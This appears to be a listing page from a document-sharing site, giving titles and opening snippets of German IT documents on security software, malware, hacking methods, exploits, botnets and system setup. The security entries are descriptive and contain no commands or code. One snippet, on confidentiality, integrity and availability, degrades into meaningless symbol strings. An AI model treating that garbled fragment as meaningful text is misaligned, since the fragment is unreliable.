Systemempfehlungen. Sage HWP / Primus SQL 25.11.2013. Robert Gabriel ROCONGRUPPE

Systemempfehlungen. Sage HWP / Primus SQL 25.11.2013. Robert Gabriel ROCONGRUPPE 25.11.2013 Systemempfehlungen Sage HWP / Primus SQL Robert Gabriel ROCONGRUPPE Inhalt Einzelplatzrechner:... 2 Thema SQL Server... 2 Thema Microsoft Office... 3 Server/Netzwerke... 3 Hinweis SBS Server

Mehr

confidentiality (Vertraulichkeit) integrity (Integrität, Unversehrtheit) availability (Erreichbarkeit)

confidentiality (Vertraulichkeit) integrity (Integrität, Unversehrtheit) availability (Erreichbarkeit) !" confidentiality (Vertraulichkeit) integrity (Integrität, Unversehrtheit) availability (Erreichbarkeit) " #$!$ %!$ &""'( "*%) &""'( "!) &""'( ") +*"",-. / " 01 01 01 0 01!1 "01 2!)$!)*!)") %!)3!)!4!)!)5!)%*!)!4

Mehr

Truecrypt. 1. Was macht das Programm Truecrypt?

Truecrypt. 1. Was macht das Programm Truecrypt? Truecrypt Johannes Mand 09/2013 1. Was macht das Programm Truecrypt? Truecrypt ist ein Programm, das Speicherträgern, also Festplatten, Sticks oder Speicherkarten in Teilen oder ganz verschlüsselt. Daten

Mehr

Sichere PCs und Laptops

Sichere PCs und Laptops Sichere PCs und Laptops Sicherheitstools mit der Bürgerkarte A-SIT Zentrum für Sichere Informationstechnologie Dipl.-Ing. Martin Centner SFG, 9. Februar 2006 A-SIT Zentrum für Sichere Informationstechnologie

Mehr

DriveLock 6. DriveLock und das Windows Sicherheitsproblem mit LNK Dateien. CenterTools Software GmbH

DriveLock 6. DriveLock und das Windows Sicherheitsproblem mit LNK Dateien. CenterTools Software GmbH 6 DriveLock und das Windows Sicherheitsproblem mit LNK Dateien CenterTools Software GmbH 2010 Copyright Die in diesen Unterlagen enthaltenen Angaben und Daten, einschließlich URLs und anderen Verweisen

Mehr

LINUX Schulung. FrauenComputerZentrum Berlin. Jutta Horstmann, Mai 2006

LINUX Schulung. FrauenComputerZentrum Berlin. Jutta Horstmann, Mai 2006 LINUX Schulung FrauenComputerZentrum Berlin Jutta Horstmann, Mai 2006 Agenda Was ist Linux Was ist Open Source Warum Open Source Software Wie sieht Open Source Software aus Was kann man damit machen Ausprobieren!!

Mehr

Lange Nacht der Wissenschaften 2007. Gefahr aus dem Internet Wie kann ich mein Windows System schützen?

Lange Nacht der Wissenschaften 2007. Gefahr aus dem Internet Wie kann ich mein Windows System schützen? Lange Nacht der Wissenschaften 2007 Gefahr aus dem Internet Wie kann ich mein Windows System schützen? Manuel Selling Humboldt Universität zu Berlin ZE Computer und Medienservice Abt. Systemsoftware und

Mehr

Sucuri Websiteschutz von

Sucuri Websiteschutz von Sucuri Websiteschutz von HostPapa Beugen Sie Malware, schwarzen Listen, falscher SEO und anderen Bedrohungen Ihrer Website vor. HostPapa, Inc. 1 888 959 PAPA [7272] +1 905 315 3455 www.hostpapa.com Malware

Mehr

Gerd Armbruster Gerd.Armbruster@GMX.De

Gerd Armbruster Gerd.Armbruster@GMX.De Viren, Trojaner & Hacker - so schützen Sie Ihren PC Gerd Armbruster Gerd.Armbruster@GMX.De 100 Mio Sony Kunden gehackt Aktuell Alles 2011 Immer noch 2011 Geschäftsmodell Agenda! Sicherheit im Internet!

Mehr

FAQ Häufig gestellte Fragen

FAQ Häufig gestellte Fragen FAQ Häufig gestellte Fragen FAQ zu HitmanPro.Kickstart Seite 1 Inhaltsverzeichnis Einführung in HitmanPro.Kickstart... 3 F-00: Wozu wird HitmanPro.Kickstart benötigt?... 4 F-01: Kann HitmanPro.Kickstart

Mehr

Byte-Taxi. Bedienungsanleitung. Seite 1 von 8

Byte-Taxi. Bedienungsanleitung. Seite 1 von 8 Byte-Taxi Bedienungsanleitung Seite 1 von 8 Inhaltsverzeichnis 1. Beschreibung 3 2. Systemvoraussetzungen 4 3. Installationsanleitung 5 4. Bedienung 6 5. Infos & Kontakt 8 Seite 2 von 8 1. Beschreibung

Mehr

DATENBLATT. Deutsche IT-Monitoring Software. Fon: 0 68 81-9 36 29 77 Fax: 0 68 81-9 36 29 99. Koßmannstraße 7 66571 Eppelborn

DATENBLATT. Deutsche IT-Monitoring Software. Fon: 0 68 81-9 36 29 77 Fax: 0 68 81-9 36 29 99. Koßmannstraße 7 66571 Eppelborn DATENBLATT Datenblatt IT Monitoring mit bedeutet Monitoring von Hardware, Software, Netzwerke und Kommunikation. bietet Lösungsansätze, mit denen Partner die Anforderungen ihrer Kunden optimal bedienen

Mehr

Avira Professional / Server Security. Date

Avira Professional / Server Security. Date Date Agenda Wozu benötige ich einen Virenschutz für Workstations/Server? Systemanforderungen der Avira Professional Security Was bietet die Avira Professional Security? Systemanforderungen der Avira Professional

Mehr

Computeria Dietikon 28. April Hans-Ueli Preisig, Computeria-Dietikon

Computeria Dietikon 28. April Hans-Ueli Preisig, Computeria-Dietikon Hans-Ueli Preisig, Computeria-Dietikon 2016 1 Webbrowser https://de.wikipedia.org/wiki/webbrowser Webbrowser oder allgemein auch Browser, to browse, (stöbern, schmökern, umsehen, abgrasen ) sind spezielle

Mehr

Exploits Wie kann das sein?

Exploits Wie kann das sein? Exploits Durch eine Schwachstelle im Programm xyz kann ein Angreifer Schadcode einschleusen. Manchmal reicht es schon irgendwo im Internet auf ein präpariertes Jpg-Bildchen zu klicken und schon holt man

Mehr

Angriffsmethoden von Hackern. A. Verschiedene Angriffsmethoden

Angriffsmethoden von Hackern. A. Verschiedene Angriffsmethoden 1 Angriffsmethoden von Hackern A. Verschiedene Angriffsmethoden 1. IP-Spoofing IP-Spoofing bedeutet das Vortäuschen einer bestimmten IP-Adresse als Absender-Adresse. Er kann Access-Listen von Routern überlisten

Mehr

Verschlüsselt und versperrt sicheres mobiles Arbeiten Mario Winter

Verschlüsselt und versperrt sicheres mobiles Arbeiten Mario Winter Verschlüsselt und versperrt sicheres mobiles Arbeiten Mario Winter Senior Sales Engineer 1 Das Szenario 2 Früher Auf USB-Sticks Auf Netzlaufwerken Auf CDs/DVDs Auf Laptops & PCs 3 Jetzt Im Cloud Storage

Mehr

Sicher(lich) ebanking

Sicher(lich) ebanking Sicher(lich) ebanking Maja Krecov ebanking Service Beratung Zürcher Kantonalbank Geschäftshaus Hard D 8005 Zürich Postfach, 8010 Zürich Inhaltsverzeichnis o Wann ist man infiziert? o Was wollen die Hacker

Mehr

13 Informationen zu Software

13 Informationen zu Software 13 Informationen zu Software 13.1 Allgemeines zu Software Wir stellen auf den Arbeitsplätzen in den Poolräumen neben den Betriebssystemen kommerzielle Anwendungsprogramme zur Verfügung, die im Rahmen von

Mehr

Cybergefahr. Wie wir uns gegen Cyber-Crime und Online-Terror wehren können. Bearbeitet von Eddy Willems

Cybergefahr. Wie wir uns gegen Cyber-Crime und Online-Terror wehren können. Bearbeitet von Eddy Willems Cybergefahr Wie wir uns gegen Cyber-Crime und Online-Terror wehren können Bearbeitet von Eddy Willems 1. Auflage 2015. Buch. XVIII, 188 S. Softcover ISBN 978 3 658 04760 3 Format (B x L): 16,8 x 24 cm

Mehr

PC Hack erkennen 3 - Rootkits & versteckte Trojaner aufspühren

PC Hack erkennen 3 - Rootkits & versteckte Trojaner aufspühren PC Hack erkennen 3 - Rootkits & versteckte Trojaner aufspühren Eine weitere Möglichkeit, das ein PC mit einem Trojaner infiziert sein kann, ist z.b., wenn ein Backdoor Listener wie Netcat auf dem infiltriertem

Mehr

Andy Kurt Vortrag: 7.11.14. OSX - Computeria Meilen

Andy Kurt Vortrag: 7.11.14. OSX - Computeria Meilen Andy Kurt Vortrag: 7.11.14 OSX - Computeria Meilen 1 von 10 Andy Kurt Vortrag: 7.11.14 Screen IT & Multimedia AG Webseite: www.screen-online.ch Link Fernwartung: http://screen-online.ch/service/fernwartung.php

Mehr

In 15 einfachen Schritten zum mobilen PC mit Paragon Drive Copy 10 und Microsoft Windows Virtual PC

In 15 einfachen Schritten zum mobilen PC mit Paragon Drive Copy 10 und Microsoft Windows Virtual PC PARAGON Technologie GmbH, Systemprogrammierung Heinrich-von-Stephan-Str. 5c 79100 Freiburg, Germany Tel. +49 (0) 761 59018201 Fax +49 (0) 761 59018130 Internet www.paragon-software.com Email sales@paragon-software.com

Mehr

DIGITAL. Die Vertrauensfrage

DIGITAL. Die Vertrauensfrage so. DIGITAL Datenskandale schüren das Misstrauen gegen Cloud Computing. Auf der CeBIT wollen Telekom, Microsoft und Co. deshalb für mehr Vertrauen in ihre Angebote werben ihr Geschäft hängt davon ab. Sicherheitsfirmen

Mehr

Viren und Würmer. B. Mayer, M. Moser, M. Schönegger WAP (WS 2016/17) B. Mayer, M. Moser, M. Schönegger Viren und Würmer WAP (WS 2016/17) 1 / 34

Viren und Würmer. B. Mayer, M. Moser, M. Schönegger WAP (WS 2016/17) B. Mayer, M. Moser, M. Schönegger Viren und Würmer WAP (WS 2016/17) 1 / 34 Viren und Würmer B. Mayer, M. Moser, M. Schönegger WAP (WS 2016/17) B. Mayer, M. Moser, M. Schönegger Viren und Würmer WAP (WS 2016/17) 1 / 34 Inhalt 1 Überblick Malware Viren Würmer 2 SQL Slammer 3 Stuxnet

Mehr

IT-Sicherheit IAIK 1

IT-Sicherheit IAIK 1 IT-Sicherheit IAIK 1 Motivation Rechner enthalten Informationen Informationen haben Wert Manche Firmen: gesamter Wert in elektronischer Form Aufgabe von Betriebssystemen: Information vor unautorisierter

Mehr

Computersicherheit im Informationszeitalter. 15.12.2014 / Seth Buchli

Computersicherheit im Informationszeitalter. 15.12.2014 / Seth Buchli Computersicherheit im Informationszeitalter 15.12.2014 / Seth Buchli Inhalt Computersicherheit... 3 Wireless Sicherheit... 3 Sichere Passwörter erzeugen und merken... 4 Auskünfte am Telefon... 4 Post Werbegeschenke...

Mehr

Reverse Cloud. Michael Weisgerber. Channel Systems Engineer DACH September 2013

Reverse Cloud. Michael Weisgerber. Channel Systems Engineer DACH September 2013 Reverse Cloud Michael Weisgerber Channel Systems Engineer DACH September 2013 Öffentliche Wahrnehmung - heute Flame Duqu Stuxnet Page 2 2011 Palo Alto Networks. Proprietary and Confidential. Öffentliche

Mehr

G Data Whitepaper. Behaviour Blocking. Geschützt. Geschützter. G Data. Marco Lauerwald Marketing

G Data Whitepaper. Behaviour Blocking. Geschützt. Geschützter. G Data. Marco Lauerwald Marketing G Data Whitepaper Behaviour Blocking Marco Lauerwald Marketing Geschützt. Geschützter. G Data. Inhalt 1 Behaviour Blocking Mission: Unbekannte Bedrohungen bekämpfen... 2 1.1 Unbekannte Schädlinge: Die

Mehr

Die DeskCenter Management Suite veröffentlicht neue Version 8.1

Die DeskCenter Management Suite veröffentlicht neue Version 8.1 Die DeskCenter Management Suite veröffentlicht neue Version 8.1 Neues im Basis Modul Benutzerdefinierte Felder Die DeskCenter Management Suite erlaubt nun das Erstellen von selbst definierten Eingabefeldern.

Mehr

Softwaresicherheit. Sicherheitsschwachstellen im größeren Kontext. Ulrich Bayer

Softwaresicherheit. Sicherheitsschwachstellen im größeren Kontext. Ulrich Bayer Softwaresicherheit Sicherheitsschwachstellen im größeren Kontext Ulrich Bayer Conect Informunity, 30.1.2013 2 Begriffe - Softwaresicherheit Agenda 1. Einführung Softwaresicherheit 1. Begrifflichkeiten

Mehr

ZMI Benutzerhandbuch Sophos. Sophos Virenscanner Benutzerhandbuch

ZMI Benutzerhandbuch Sophos. Sophos Virenscanner Benutzerhandbuch ZMI Benutzerhandbuch Sophos Sophos Virenscanner Benutzerhandbuch Version: 1.0 12.07.2007 Herausgeber Zentrum für Medien und IT ANSCHRIFT: HAUS-/ZUSTELLADRESSE: TELEFON: E-MAIL-ADRESSE: Zentrum für Medien

Mehr

Viren - Wie sicher ist Mobile Commerce? Patrick Heinen Systems Engineer Symantec (Deutschland) GmbH

Viren - Wie sicher ist Mobile Commerce? Patrick Heinen Systems Engineer Symantec (Deutschland) GmbH Viren - Wie sicher ist Mobile Commerce? Patrick Heinen s Engineer (Deutschland) GmbH 1 Inhalt Viren, Würmer und Trojaner Definition Funktion Typen Geschichte Virenscannern - Abwehrmechanismen Anforderungen

Mehr

Schwachstellenanalyse 2012

Schwachstellenanalyse 2012 Schwachstellenanalyse 2012 Sicherheitslücken und Schwachstellen in Onlineshops Andre C. Faßbender Schwachstellenforschung Faßbender 13.01.2012 Inhaltsverzeichnis 1. Abstract... 3 2. Konfiguration der getesteten

Mehr

Übersicht. Virtuelle Maschinen Erlaubnisse (Permission, Rechte) Ringe. AVS SS Teil 12/Protection

Übersicht. Virtuelle Maschinen Erlaubnisse (Permission, Rechte) Ringe. AVS SS Teil 12/Protection Übersicht Virtuelle Maschinen Erlaubnisse (Permission, Rechte) Ringe 2 Behandelter Bereich: Virtualisierung Syscall-Schnittstelle Ports Server Apps Server Apps Betriebssystem Protokolle Betriebssystem

Mehr

WINDOWS 7. Druckerkonfiguration - Systemsteuerung - Sicherheit

WINDOWS 7. Druckerkonfiguration - Systemsteuerung - Sicherheit WINDOWS 7 Druckerkonfiguration - Systemsteuerung - Sicherheit Druckerverwaltung ab Seite 91 = Standarddrucker Druckaufträge verwalten ab Seite 96 Systemsteuerung ab Seite 97 System Information über das

Mehr

Open for Business - Open to Attack? Walter Lender, Geschäftsführer, Visonys IT-Security Software GesmbH

Open for Business - Open to Attack? Walter Lender, Geschäftsführer, Visonys IT-Security Software GesmbH Open for Business - Open to Attack? Walter Lender, Geschäftsführer, Visonys IT-Security Software GesmbH 2 Open for Business - Open to Attack? 75% aller Angriffe zielen auf Webanwendungen (Gartner, ISS)

Mehr

Der optimale Schutz für dynamische Unternehmens-Netzwerke

Der optimale Schutz für dynamische Unternehmens-Netzwerke Der optimale Schutz für dynamische Unternehmens-Netzwerke Kaspersky Open Space Security steht für den zuverlässigen Schutz von Firmen- Netzwerken, die immer mehr zu offenen Systemen mit ständig wechselnden

Mehr

Sicherheit für Windows Vista Teil 2: Windows Tool zum Entfernen bösartiger Software

Sicherheit für Windows Vista Teil 2: Windows Tool zum Entfernen bösartiger Software Sicherheit für Windows Vista Teil 2: Windows Tool zum Entfernen bösartiger Software Dieser Artikel ist Teil 2 zum Thema Sicherheit für Windows Vista. Wir zeigen Ihnen hier, wie Sie mit dem kostenlosen

Mehr

Seminarvortrag. Anton Ebertzeder 02.12.2010. von

Seminarvortrag. Anton Ebertzeder 02.12.2010. von Seminarvortrag von Anton Ebertzeder am 02.12.2010 Überblick 1. Definitionen 2. Lebenszyklus 3. Verwendung von Botnets 4. Bekannte Botnets 5. Schutzmöglichkeiten 02.12.2010 Anton Ebertzeder 2 Definitionen

Mehr

[Produktinformationen zu Kaspersky Anti-Virus Business-Optimal]

[Produktinformationen zu Kaspersky Anti-Virus Business-Optimal] IT-Services & Solutions Ing.-Büro WIUME [Produktinformationen zu Kaspersky Anti-Virus Business-Optimal] Produktinformationen zu Kaspersky Anti-Virus Business-Optimal by Ing.-Büro WIUME / Kaspersky Lab

Mehr

Informationssicherheit

Informationssicherheit Informationssicherheit Sibylle Schwarz Westsächsische Hochschule Zwickau Dr. Friedrichs-Ring 2a, RII 263 http://wwwstud.fh-zwickau.de/~sibsc/ sibylle.schwarz@fh-zwickau.de WS 2009/2010 Informationssicherheit

Mehr

So funktionieren Computer

So funktionieren Computer So funktionieren Computer Ein visueller Streifzug durch den Computer & alles, was dazu gehört Ron White Illustrationen: Timothy Edward Downs und Sarah Ishida Alcantara Übersetzung aus dem Amerikanischen:

Mehr

Forensische Analyse einer Online Durchsuchung

Forensische Analyse einer Online Durchsuchung Forensische Analyse einer Online Durchsuchung Felix C. Freiling Universität Mannheim Lehrstuhl für Praktische Informatik 1 Es war einmal... Tag der Informatik, Universität Erlangen, 25. April 2008 4/21

Mehr

Angreifbarkeit von Webapplikationen

Angreifbarkeit von Webapplikationen Vortrag über die Risiken und möglichen Sicherheitslücken bei der Entwicklung datenbankgestützter, dynamischer Webseiten Gliederung: Einführung technische Grundlagen Strafbarkeit im Sinne des StGB populäre

Mehr

Allgemeine Hintergrundinformation über Viren

Allgemeine Hintergrundinformation über Viren Allgemeine Hintergrundinformation über Viren Allgemeine Hintergrundinformation über Viren 1. Was ist ein Virus? Ein Computervirus ist ein Programm oder eine Folge von Anweisungen, mit dem Ziel sich zu

Mehr

INSTALLATION OFFICE 2013

INSTALLATION OFFICE 2013 INSTALLATION OFFICE 2013 DURCH OFFICE 365 Zur Verfügung gestellt von PCProfi Informatique SA Einleitung Das folgende Dokument beschreibt Ihnen Schritt für Schritt, wie man Office Umgebung 2013 auf Ihren

Mehr

Sophos Anti-Virus. Felizitas Heinebrodt. Technische Hochschule Nürnberg Rechenzentrum Kesslerplatz 12, 90489 Nürnberg. Version 12 September 2014

Sophos Anti-Virus. Felizitas Heinebrodt. Technische Hochschule Nürnberg Rechenzentrum Kesslerplatz 12, 90489 Nürnberg. Version 12 September 2014 Sophos Anti-Virus Felizitas Heinebrodt Technische Hochschule Nürnberg Rechenzentrum Kesslerplatz 12, 90489 Nürnberg Version 12 September 2014 DokID: sophos Vers. 12, 20.08.2015, RZ/THN Informationen des

Mehr

Sicherheit bei PCs, Tablets und Smartphones

Sicherheit bei PCs, Tablets und Smartphones Michaela Wirth, IT-Sicherheit http://www.urz.uni-heidelberg.de/it-sicherheitsregeln Stand März 2015 Computer sind aus unserem Alltag nicht mehr wegzudenken. PCs, Notebooks, Tablets und Smartphones begleiten

Mehr

Der optimale Schutz für dynamische Unternehmens-Netzwerke

Der optimale Schutz für dynamische Unternehmens-Netzwerke Der optimale Schutz für dynamische Unternehmens-Netzwerke Kaspersky Open Space Security steht für den zuverlässigen Schutz von Firmen- Netzwerken, die immer mehr zu offenen Systemen mit ständig wechselnden

Mehr

tzeforderung Installationsleitfaden Dieser Wegweiser führt Sie durch die Installation des Programms

tzeforderung Installationsleitfaden Dieser Wegweiser führt Sie durch die Installation des Programms tzeforderung Installationsleitfaden Dieser Wegweiser führt Sie durch die Installation des Programms EDV-Beratung Thomas Zecher 25.05.2013 1. Inhalt 2. Systemvoraussetzungen... 3 a).net Framework... 3 b)

Mehr

Intrusion Detection Systeme. Definition (BSI) Alternative Definition IDS

Intrusion Detection Systeme. Definition (BSI) Alternative Definition IDS Intrusion Detection Systeme IDS 1 Definition (BSI) Aktive Überwachung von Systemen und Netzen mit dem Ziel der Erkennung von Angriffen und Missbrauch. Aus allen im Überwachungsbereich stattfindenen Ereignissen

Mehr

Installationsanleitung MS SQL Server 2005. für Sage 50 Ablage & Auftragsbearbeitung. Sage Schweiz AG D4 Platz 10 CH-6039 Root Längenbold

Installationsanleitung MS SQL Server 2005. für Sage 50 Ablage & Auftragsbearbeitung. Sage Schweiz AG D4 Platz 10 CH-6039 Root Längenbold Installationsanleitung MS SQL Server 2005 für Sage 50 Ablage & Auftragsbearbeitung Sage Schweiz AG D4 Platz 10 CH-6039 Root Längenbold Inhaltsverzeichnis 1. GRUNDSÄTZLICHES... 3 2. SQLExpress Installationsanleitung

Mehr

Hochschule Darmstadt - Fachbereich Informatik - Fachschaft des Fachbereiches

Hochschule Darmstadt - Fachbereich Informatik - Fachschaft des Fachbereiches Hochschule Darmstadt - Fachbereich Informatik - Fachschaft des Fachbereiches Verwendung der bereitgestellten Virtuellen Maschinen»Einrichten einer Virtuellen Maschine mittels VirtualBox sowie Zugriff auf

Mehr

Money for Nothing... and Bits4free

Money for Nothing... and Bits4free Money for Nothing... and Bits4free 8.8.2011 Gilbert Wondracek, gilbert@iseclab.org Hacker & Co Begriff hat je nach Kontext andere Bedeutung, Ursprung: 50er Jahre, MIT Ausnutzen von Funktionalität die vom

Mehr

F-Secure Anti-Virus for Mac 2015

F-Secure Anti-Virus for Mac 2015 F-Secure Anti-Virus for Mac 2015 2 Inhalt F-Secure Anti-Virus for Mac 2015 Inhalt Kapitel 1: Einstieg...3 1.1 Abonnement verwalten...4 1.2 Wie kann ich sicherstellen, dass mein Computer geschützt ist?...4

Mehr

Konsumenteninformation

Konsumenteninformation Konsumenteninformation BEGRIFFE ABC Account Ist die Berechtigung um eine Dienstleistung im Internet nutzen zu können. Solche Benutzerkonten können kostenpflichtig oder aber auch gratis sein. App Programme

Mehr

GeoShop Netzwerkhandbuch

GeoShop Netzwerkhandbuch Technoparkstrasse 1 8005 Zürich Tel.: 044 / 350 10 10 Fax.: 044 / 350 10 19 GeoShop Netzwerkhandbuch Zusammenfassung Diese Dokumentation beschreibt die Einbindung des GeoShop in bestehende Netzwerkumgebungen.

Mehr

Implementierung von Dateisystemen

Implementierung von Dateisystemen Implementierung von Dateisystemen Teil 2 Prof. Dr. Margarita Esponda WS 2011/2012 44 Effizienz und Leistungssteigerung Festplatten sind eine wichtige Komponente in jedem Rechnersystem und gleichzeitig

Mehr

Internet: Was ist das? - Routing

Internet: Was ist das? - Routing Internet: Was ist das? - Routing Auch Router Server Router Client ClientServer? Grundlagen Internet Sicherheit Angriffe Schutz Internet Map, The Opte Project Internet: Was ist das? - Netzwerk Peer-to-Peer

Mehr